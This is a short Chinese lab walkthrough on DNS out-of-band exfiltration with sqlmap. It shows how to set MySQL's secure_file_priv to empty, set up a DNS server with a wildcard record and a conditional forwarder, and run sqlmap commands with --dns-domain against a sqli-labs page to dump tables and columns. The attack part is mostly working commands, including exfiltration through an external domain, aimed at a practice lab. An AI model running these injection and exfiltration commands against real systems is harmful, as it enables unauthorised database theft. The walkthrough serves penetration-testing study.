复现dns外带数据结合sqlmap

设置mysql的secure_file_priv属性

secure_file_priv为空，就可以读取磁盘的目录
secure_file_priv为D:\，就可以读取D盘的文件
secure_file_priv为null，load_file就不能加载文件
添加一句secure_file_priv=“”

配置dns服务器

1.添加角色

2.添加正向查找

3.新建主机
IP地址为sqlmap所在虚机的ip地址

在创建一个泛解析

使用虚拟机ping刚刚在服务端设置的域名，并且在kali中输入tcpdump -n port 53；查看信息返回。


4.创建条件转发器

SQLMap使用外带dns注入

取库

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables

获取表

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables 

获取列

sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns